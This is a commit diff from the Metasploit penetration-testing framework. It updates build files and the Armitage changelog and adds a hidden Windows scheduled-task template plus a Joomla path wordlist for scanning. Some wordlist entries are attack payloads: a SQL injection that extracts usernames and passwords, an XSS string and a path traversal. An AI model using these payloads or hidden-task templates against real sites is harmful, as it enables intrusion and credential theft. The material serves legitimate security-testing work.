Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7
commit
c423ad2583
|
@ -1,4 +1,8 @@
|
|||
language: ruby
|
||||
before_install:
|
||||
- sudo apt-get update -qq
|
||||
- sudo apt-get install -qq libpcap-dev
|
||||
|
||||
rvm:
|
||||
#- '1.8.7'
|
||||
- '1.9.3'
|
||||
|
@ -6,3 +10,5 @@ rvm:
|
|||
notifications:
|
||||
irc: "irc.freenode.org#msfnotify"
|
||||
|
||||
git:
|
||||
depth: 1
|
||||
|
|
12
Gemfile
12
Gemfile
|
@ -4,10 +4,20 @@ source 'http://rubygems.org'
|
|||
gem 'activesupport', '>= 3.0.0'
|
||||
# Needed for Msf::DbManager
|
||||
gem 'activerecord'
|
||||
# Needed for some admin modules (scrutinizer_add_user.rb)
|
||||
gem 'json'
|
||||
# Database models shared between framework and Pro.
|
||||
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
|
||||
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0'
|
||||
# Needed by msfgui and other rpc components
|
||||
gem 'msgpack'
|
||||
# Needed by anemone crawler
|
||||
gem 'nokogiri'
|
||||
# Needed for module caching in Mdm::ModuleDetails
|
||||
gem 'pg', '>= 0.11'
|
||||
# Needed by anemone crawler
|
||||
gem 'robots'
|
||||
# For sniffer and raw socket modules
|
||||
gem 'pcaprub'
|
||||
|
||||
group :development do
|
||||
# Markdown formatting for yard
|
||||
|
|
30
Gemfile.lock
30
Gemfile.lock
|
@ -1,10 +1,10 @@
|
|||
GIT
|
||||
remote: git://github.com/rapid7/metasploit_data_models.git
|
||||
revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
|
||||
tag: 0.3.0
|
||||
revision: 448c1065329efea1eac76a3897f626f122666743
|
||||
tag: 0.4.0
|
||||
specs:
|
||||
metasploit_data_models (0.3.0)
|
||||
activerecord
|
||||
metasploit_data_models (0.4.0)
|
||||
activerecord (>= 3.2.10)
|
||||
activesupport
|
||||
pg
|
||||
pry
|
||||
|
@ -12,15 +12,15 @@ GIT
|
|||
GEM
|
||||
remote: http://rubygems.org/
|
||||
specs:
|
||||
activemodel (3.2.9)
|
||||
activesupport (= 3.2.9)
|
||||
activemodel (3.2.11)
|
||||
activesupport (= 3.2.11)
|
||||
builder (~> 3.0.0)
|
||||
activerecord (3.2.9)
|
||||
activemodel (= 3.2.9)
|
||||
activesupport (= 3.2.9)
|
||||
activerecord (3.2.11)
|
||||
activemodel (= 3.2.11)
|
||||
activesupport (= 3.2.11)
|
||||
arel (~> 3.0.2)
|
||||
tzinfo (~> 0.3.29)
|
||||
activesupport (3.2.9)
|
||||
activesupport (3.2.11)
|
||||
i18n (~> 0.6)
|
||||
multi_json (~> 1.0)
|
||||
arel (3.0.2)
|
||||
|
@ -28,8 +28,12 @@ GEM
|
|||
coderay (1.0.8)
|
||||
diff-lcs (1.1.3)
|
||||
i18n (0.6.1)
|
||||
json (1.7.7)
|
||||
method_source (0.8.1)
|
||||
msgpack (0.5.2)
|
||||
multi_json (1.0.4)
|
||||
nokogiri (1.5.6)
|
||||
pcaprub (0.11.3)
|
||||
pg (0.14.1)
|
||||
pry (0.9.10)
|
||||
coderay (~> 1.0.5)
|
||||
|
@ -37,6 +41,7 @@ GEM
|
|||
slop (~> 3.3.1)
|
||||
rake (10.0.2)
|
||||
redcarpet (2.2.2)
|
||||
robots (0.10.1)
|
||||
rspec (2.12.0)
|
||||
rspec-core (~> 2.12.0)
|
||||
rspec-expectations (~> 2.12.0)
|
||||
|
@ -59,10 +64,15 @@ PLATFORMS
|
|||
DEPENDENCIES
|
||||
activerecord
|
||||
activesupport (>= 3.0.0)
|
||||
json
|
||||
metasploit_data_models!
|
||||
msgpack
|
||||
nokogiri
|
||||
pcaprub
|
||||
pg (>= 0.11)
|
||||
rake
|
||||
redcarpet
|
||||
robots
|
||||
rspec (>= 2.12)
|
||||
simplecov (= 0.5.4)
|
||||
yard
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -1,6 +1,55 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
12 Feb 13 (tested against msf 16438)
|
||||
---------
|
||||
- Fixed a corner case preventing the display of removed host labels
|
||||
when connected to a team server.
|
||||
- Fixed RPC call cache corruption in team server mode. This bug could
|
||||
lead to some exploits defaulting to a shell payload when meterpreter
|
||||
was a possibility.
|
||||
- Slight optimization to some DB queries. I no longer pull unused
|
||||
fields making the query marginally faster. Team server is more
|
||||
efficient too as changes to unused fields won't force data (re)sync.
|
||||
- Hosts -> Clear Database now clears host labels too.
|
||||
- Added the ability to manage multiple team server instances through
|
||||
Armitage. Go to Armitage -> New Connection to connect to another
|
||||
server. A button bar will appear that allows you to switch active
|
||||
Armitage connections.
|
||||
- Credentials available across instances are pooled when using
|
||||
the [host] -> Login menu and the credential helper.
|
||||
- Rewrote the event log management code in the team server
|
||||
- Added nickname tab completion to event log. I feel like I'm writing
|
||||
an IRC client again.
|
||||
- Hosts -> Clear Database now asks you to confirm the action.
|
||||
- Hosts -> Import Hosts announces successful import to event log again.
|
||||
|
||||
23 Jan 13 (tested against msf 16351)
|
||||
---------
|
||||
- Added helpers to set EXE::Custom and EXE::Template options.
|
||||
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
|
||||
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
|
||||
check if a proxy server is up was deadlock prone. Removed it.
|
||||
- Starting SOCKS Proxy module now opens a tab displaying the module
|
||||
start process. An event is posted to the event log too.
|
||||
- Created an option helper to select credentials for SMBUser, SMBPass,
|
||||
USERNAME, and PASSWORD.
|
||||
- Added a feature to label hosts. A label will show up in its own column
|
||||
in table view or below all info in graph view. Any team member may
|
||||
change a label through [host] -> host -> Set Label. You may also use
|
||||
dynamic workspaces to show hosts with certain labels attached.
|
||||
- Fixed bad things happening when connecting Armitage to 'localhost' and
|
||||
not '127.0.0.1'.
|
||||
- Screenshots and Webcam shots are now centered in their tab.
|
||||
- Added an alternate .bat file to start msfrpcd on Windows in the
|
||||
Metasploit 4.5 installer's environment.
|
||||
- Added a color-style for [!] warning messages
|
||||
|
||||
Cortana Updates (for scripters)
|
||||
--------
|
||||
- &handler function now works as advertised.
|
||||
- Cortana now avoids use of core.setg
|
||||
|
||||
4 Jan 13 (tested against msf 16252)
|
||||
--------
|
||||
- Added a helper to set REXE option
|
||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>normal.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t> </w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts>
|
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,2 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings>
|
|
@ -0,0 +1,50 @@
|
|||
<?xml version="1.0" encoding="UTF-16"?>
|
||||
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
|
||||
<RegistrationInfo>
|
||||
<Date>DATEHERE</Date>
|
||||
<Author>USERHERE</Author>
|
||||
</RegistrationInfo>
|
||||
<Triggers>
|
||||
<TimeTrigger>
|
||||
<Repetition>
|
||||
<Interval>PT60M</Interval>
|
||||
<StopAtDurationEnd>false</StopAtDurationEnd>
|
||||
</Repetition>
|
||||
<StartBoundary>DATEHERE</StartBoundary>
|
||||
<Enabled>true</Enabled>
|
||||
</TimeTrigger>
|
||||
</Triggers>
|
||||
<Principals>
|
||||
<Principal id="Author">
|
||||
<UserId>DOMAINHERE</UserId>
|
||||
<LogonType>S4U</LogonType>
|
||||
<RunLevel>LeastPrivilege</RunLevel>
|
||||
</Principal>
|
||||
</Principals>
|
||||
<Settings>
|
||||
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
|
||||
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
|
||||
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
|
||||
<AllowHardTerminate>true</AllowHardTerminate>
|
||||
<StartWhenAvailable>false</StartWhenAvailable>
|
||||
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
|
||||
<IdleSettings>
|
||||
<Duration>PT10M</Duration>
|
||||
<WaitTimeout>PT1H</WaitTimeout>
|
||||
<StopOnIdleEnd>true</StopOnIdleEnd>
|
||||
<RestartOnIdle>false</RestartOnIdle>
|
||||
</IdleSettings>
|
||||
<AllowStartOnDemand>true</AllowStartOnDemand>
|
||||
<Enabled>true</Enabled>
|
||||
<Hidden>true</Hidden>
|
||||
<RunOnlyIfIdle>false</RunOnlyIfIdle>
|
||||
<WakeToRun>false</WakeToRun>
|
||||
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
|
||||
<Priority>7</Priority>
|
||||
</Settings>
|
||||
<Actions Context="Author">
|
||||
<Exec>
|
||||
<Command>COMMANDHERE</Command>
|
||||
</Exec>
|
||||
</Actions>
|
||||
</Task>
|
Binary file not shown.
|
@ -1,20 +0,0 @@
|
|||
class AddCredFileTable < ActiveRecord::Migration
|
||||
|
||||
def self.up
|
||||
create_table :cred_files do |t|
|
||||
t.integer :workspace_id, :null => false, :default => 1
|
||||
t.string :path, :limit => 1024
|
||||
t.string :ftype, :limit => 16
|
||||
t.string :created_by
|
||||
t.string :name, :limit => 512
|
||||
t.string :desc, :limit => 1024
|
||||
|
||||
t.timestamps
|
||||
end
|
||||
end
|
||||
|
||||
def self.down
|
||||
drop_table :cred_files
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,627 @@
|
|||
&controller=../../../../../../../../../../../../[LFI]%00
|
||||
?1.5.10-x
|
||||
?1.5.11-x-http_ref
|
||||
?1.5.11-x-php-s3lf
|
||||
?1.5.3-path-disclose
|
||||
?1.5.3-spam
|
||||
?1.5.8-x
|
||||
?1.5.9-x
|
||||
?j1012-fixate-session
|
||||
?option=com_mysms&Itemid=0&task=phonebook
|
||||
Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
|
||||
admin/
|
||||
administrator/
|
||||
administrator/components/
|
||||
administrator/components/com_a6mambocredits/
|
||||
administrator/components/com_a6mambohelpdesk/
|
||||
administrator/components/com_admin/admin.admin.html.php
|
||||
administrator/components/com_astatspro/refer.php
|
||||
administrator/components/com_bayesiannaivefilter/
|
||||
administrator/components/com_chronocontact/excelwriter/PPS/File.php
|
||||
administrator/components/com_colophon/
|
||||
administrator/components/com_colorlab/
|
||||
administrator/components/com_comprofiler/
|
||||
administrator/components/com_comprofiler/plugin.class.php
|
||||
administrator/components/com_cropimage/admin.cropcanvas.php
|
||||
administrator/components/com_extplorer/
|
||||
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
|
||||
administrator/components/com_googlebase/
|
||||
administrator/components/com_installer
|
||||
administrator/components/com_jcs/
|
||||
administrator/components/com_jim/
|
||||
administrator/components/com_jjgallery/
|
||||
administrator/components/com_joom12pic/
|
||||
administrator/components/com_joomla-visites/
|
||||
administrator/components/com_joomla_flash_uploader/
|
||||
administrator/components/com_joomlaflashfun/
|
||||
administrator/components/com_joomlaradiov5/
|
||||
administrator/components/com_jpack/
|
||||
administrator/components/com_jreactions/
|
||||
administrator/components/com_juser/
|
||||
administrator/components/com_admin/
|
||||
administrator/components/com_kochsuite /
|
||||
administrator/components/com_linkdirectory/
|
||||
administrator/components/com_livechat/getSavedChatRooms.php
|
||||
administrator/components/com_livechat/xmlhttp.php
|
||||
administrator/components/com_lurm_constructor/admin.lurm_constructor.php
|
||||
administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
|
||||
administrator/components/com_mambelfish/
|
||||
administrator/components/com_mgm/
|
||||
administrator/components/com_mmp/help.mmp.php
|
||||
administrator/components/com_mosmedia/
|
||||
administrator/components/com_multibanners/extadminmenus.class.php
|
||||
administrator/components/com_panoramic/
|
||||
administrator/components/com_peoplebook/param.peoplebook.php
|
||||
administrator/components/com_phpshop/toolbar.phpshop.html.php
|
||||
administrator/components/com_remository/admin.remository.php
|
||||
administrator/components/com_serverstat/install.serverstat.php
|
||||
administrator/components/com_simpleswfupload/uploadhandler.php");
|
||||
administrator/components/com_swmenupro/
|
||||
administrator/components/com_treeg/
|
||||
administrator/components/com_uhp/
|
||||
administrator/components/com_uhp2/
|
||||
administrator/components/com_webring/
|
||||
administrator/components/com_wmtgallery/
|
||||
administrator/components/com_wmtportfolio/
|
||||
administrator/components/com_x-shop/
|
||||
administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
|
||||
administrator/index.php?option=com_searchlog&act=log
|
||||
ajaxim/
|
||||
akocomments.php
|
||||
cart?Itemid=[SQLi]
|
||||
component/com__brightweblinks/
|
||||
component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
|
||||
component/osproperty/?task=agent_register
|
||||
component/quran/index.php?option=com_quran&action=viewayat&surano=
|
||||
components/com_ clickheat/
|
||||
components/com_5starhotels/
|
||||
components/com_Jambook/jambook.php
|
||||
components/com_a6mambocredits/
|
||||
components/com_a6mambohelpdesk/
|
||||
components/com_ab_gallery/
|
||||
components/com_acajoom/
|
||||
components/com_acctexp/
|
||||
components/com_aclassf/
|
||||
components/com_activities/
|
||||
components/com_actualite/
|
||||
components/com_admin/admin.admin.html.php
|
||||
components/com_advancedpoll/
|
||||
components/com_agora/
|
||||
components/com_agoragroup/
|
||||
components/com_ajaxchat/
|
||||
components/com_akobook/
|
||||
components/com_akocomment/
|
||||
components/com_akogallery
|
||||
components/com_alberghi/
|
||||
components/com_allhotels/
|
||||
components/com_alphacontent/
|
||||
components/com_altas/
|
||||
components/com_amocourse/
|
||||
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
|
||||
components/com_articles/
|
||||
components/com_artist/
|
||||
components/com_artlinks/
|
||||
components/com_asortyment/
|
||||
components/com_astatspro/
|
||||
components/com_awesom/
|
||||
components/com_babackup/
|
||||
components/com_banners/
|
||||
components/com_bayesiannaivefilter/
|
||||
components/com_be_it_easypartner/
|
||||
components/com_beamospetition/
|
||||
components/com_biblestudy/
|
||||
components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
|
||||
components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
|
||||
components/com_blog/
|
||||
components/com_bookflip/
|
||||
components/com_bookjoomlas/
|
||||
components/com_booklibrary/
|
||||
components/com_books/
|
||||
components/com_bsadv/
|
||||
components/com_bsq_sitestats/
|
||||
components/com_bsq_sitestats/external/rssfeed.php
|
||||
components/com_bsqsitestats/
|
||||
components/com_calendar/
|
||||
components/com_camelcitydb2/
|
||||
components/com_candle/
|
||||
components/com_casino_blackjack/
|
||||
components/com_casino_videopoker/
|
||||
components/com_casinobase/
|
||||
components/com_catalogproduction/
|
||||
components/com_catalogshop/
|
||||
components/com_category/
|
||||
components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
|
||||
components/com_chronocontact/excelwriter/PPS/File.php
|
||||
components/com_cinema/
|
||||
components/com_clasifier/
|
||||
components/com_classifieds/
|
||||
components/com_clickheat/
|
||||
components/com_cloner/
|
||||
components/com_cmimarketplace/
|
||||
components/com_cms/
|
||||
components/com_colophon/
|
||||
components/com_colorlab/
|
||||
components/com_competitions/
|
||||
components/com_comprofiler/
|
||||
components/com_comprofiler/plugin.class.php
|
||||
components/com_contactinfo/
|
||||
components/com_content/
|
||||
components/com_cpg/cpg.php
|
||||
components/com_cropimage/admin.cropcanvas.php
|
||||
components/com_custompages/
|
||||
components/com_cx/
|
||||
components/com_d3000/
|
||||
components/com_dadamail/
|
||||
components/com_dailymessage/
|
||||
components/com_datsogallery/
|
||||
components/com_dbquery/
|
||||
components/com_detail/
|
||||
components/com_digistore/
|
||||
components/com_directory/
|
||||
components/com_djiceshoutbox/
|
||||
components/com_doc/
|
||||
components/com_downloads/
|
||||
components/com_ds-syndicate/
|
||||
components/com_dtregister/
|
||||
components/com_dv/externals/phpupload/upload.php");
|
||||
components/com_easybook/
|
||||
components/com_emcomposer/
|
||||
components/com_equotes/
|
||||
components/com_estateagent/
|
||||
components/com_eventing/
|
||||
components/com_eventlist/
|
||||
components/com_events/
|
||||
components/com_ewriting/
|
||||
components/com_expose/uploadimg.php
|
||||
components/com_expshop/
|
||||
components/com_extcalendar/
|
||||
components/com_extcalendar/cal_popup.php?extmode=view&extid=
|
||||
components/com_extcalendar/extcalendar.php
|
||||
components/com_extended_registration/registration_detailed.inc.php
|
||||
components/com_extplorer/
|
||||
components/com_ezine/
|
||||
components/com_ezstore/
|
||||
components/com_facileforms/
|
||||
components/com_fantasytournament/
|
||||
components/com_faq/
|
||||
components/com_feederator/includes/tmsp/add_tmsp.php
|
||||
components/com_filebase/
|
||||
components/com_filiale/
|
||||
components/com_flashfun/
|
||||
components/com_flashmagazinedeluxe/
|
||||
components/com_flippingbook/
|
||||
components/com_flyspray/startdown.php
|
||||
components/com_fm/fm.install.php
|
||||
components/com_foevpartners/
|
||||
components/com_football/
|
||||
components/com_formtool/
|
||||
components/com_forum/
|
||||
components/com_fq/
|
||||
components/com_fundraiser/
|
||||
components/com_galeria/
|
||||
components/com_galleria/galleria.html.php
|
||||
components/com_gallery/
|
||||
components/com_game/
|
||||
components/com_gameq/
|
||||
components/com_garyscookbook/
|
||||
components/com_genealogy/
|
||||
components/com_geoboerse/
|
||||
components/com_gigcal/
|
||||
components/com_gmaps/
|
||||
components/com_googlebase/
|
||||
components/com_gsticketsystem/
|
||||
components/com_guide/
|
||||
components/com_hashcash/server.php
|
||||
components/com_hbssearch/
|
||||
components/com_hello_world/
|
||||
components/com_hotproperties/
|
||||
components/com_hotproperty/
|
||||
components/com_hotspots/
|
||||
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
|
||||
components/com_hwdvideoshare/
|
||||
components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
|
||||
components/com_ice/
|
||||
components/com_idoblog/
|
||||
components/com_idvnews/
|
||||
components/com_ignitegallery/
|
||||
components/com_ijoomla_archive/
|
||||
components/com_ijoomla_rss/
|
||||
components/com_inter/
|
||||
components/com_ionfiles/
|
||||
components/com_is/
|
||||
components/com_ixxocart/
|
||||
components/com_jabode/
|
||||
components/com_jashowcase/
|
||||
components/com_jb2/
|
||||
components/com_jce/
|
||||
components/com_jcs/
|
||||
components/com_jd-wiki/
|
||||
components/com_jd-wp/
|
||||
components/com_jim/
|
||||
components/com_jjgallery/
|
||||
components/com_jmovies/
|
||||
components/com_jobline/
|
||||
components/com_jombib/
|
||||
components/com_joobb/
|
||||
components/com_jooget/
|
||||
components/com_joom12pic/
|
||||
components/com_joomla-visites/
|
||||
components/com_joomla_flash_uploader/
|
||||
components/com_joomlaboard/
|
||||
components/com_joomladate/
|
||||
components/com_joomlaflashfun/
|
||||
components/com_joomlalib/
|
||||
components/com_joomlaradiov5/
|
||||
components/com_joomlavvz/
|
||||
components/com_joomlaxplorer/
|
||||
components/com_joomloads/
|
||||
components/com_joomradio/
|
||||
components/com_joomtracker/
|
||||
components/com_joovideo/
|
||||
components/com_jotloader/
|
||||
components/com_journal/
|
||||
components/com_jpack/
|
||||
components/com_jpad/
|
||||
components/com_jreactions/
|
||||
components/com_jreviews/scripts/xajax.inc.php
|
||||
components/com_jumi/
|
||||
components/com_juser/
|
||||
components/com_jvideo/
|
||||
components/com_k2/
|
||||
components/com_kbase/
|
||||
components/com_knowledgebase/fckeditor/fckeditor.js
|
||||
components/com_kochsuite /
|
||||
components/com_kunena/
|
||||
components/com_letterman/
|
||||
components/com_lexikon/
|
||||
components/com_linkdirectory/
|
||||
components/com_listoffreeads/
|
||||
components/com_livechat/getSavedChatRooms.php
|
||||
components/com_livechat/xmlhttp.php
|
||||
components/com_liveticker/
|
||||
components/com_lm/
|
||||
components/com_lmo/
|
||||
components/com_loudmounth/includes/abbc/abbc.class.php
|
||||
components/com_loudmouth/
|
||||
components/com_lowcosthotels/
|
||||
components/com_lurm_constructor/admin.lurm_constructor.php
|
||||
components/com_mad4joomla/
|
||||
components/com_madeira/img.php
|
||||
components/com_maianmusic/
|
||||
components/com_mailarchive/
|
||||
components/com_mailto/
|
||||
components/com_mambatstaff/mambatstaff.php
|
||||
components/com_mambelfish/
|
||||
components/com_mambospgm/
|
||||
components/com_mambowiki/MamboLogin.php
|
||||
components/com_marketplace/
|
||||
components/com_mcquiz/
|
||||
components/com_mdigg/
|
||||
components/com_media_library/
|
||||
components/com_mediaslide/
|
||||
components/com_mezun/
|
||||
components/com_mgm/
|
||||
components/com_minibb/
|
||||
components/com_misterestate/
|
||||
components/com_mmp/help.mmp.php
|
||||
components/com_model/
|
||||
components/com_moodle/moodle.php
|
||||
components/com_moofaq/
|
||||
components/com_mosmedia/
|
||||
components/com_mospray/scripts/admin.php
|
||||
components/com_mosres/
|
||||
components/com_most/
|
||||
components/com_mp3_allopass/
|
||||
components/com_mtree/
|
||||
components/com_mtree/img/listings/o/{id}.php
|
||||
components/com_multibanners/extadminmenus.class.php
|
||||
components/com_myalbum/
|
||||
components/com_mycontent/
|
||||
components/com_mydyngallery/
|
||||
components/com_mygallery/
|
||||
components/com_n-forms/
|
||||
components/com_na_content/
|
||||
components/com_na_mydocs/
|
||||
components/com_na_newsdescription/
|
||||
components/com_na_qforms/
|
||||
components/com_neogallery/
|
||||
components/com_neorecruit/
|
||||
components/com_neoreferences/
|
||||
components/com_netinvoice/
|
||||
components/com_news/
|
||||
components/com_news_portal/
|
||||
components/com_newsflash/
|
||||
components/com_nfn_addressbook/
|
||||
components/com_nicetalk/
|
||||
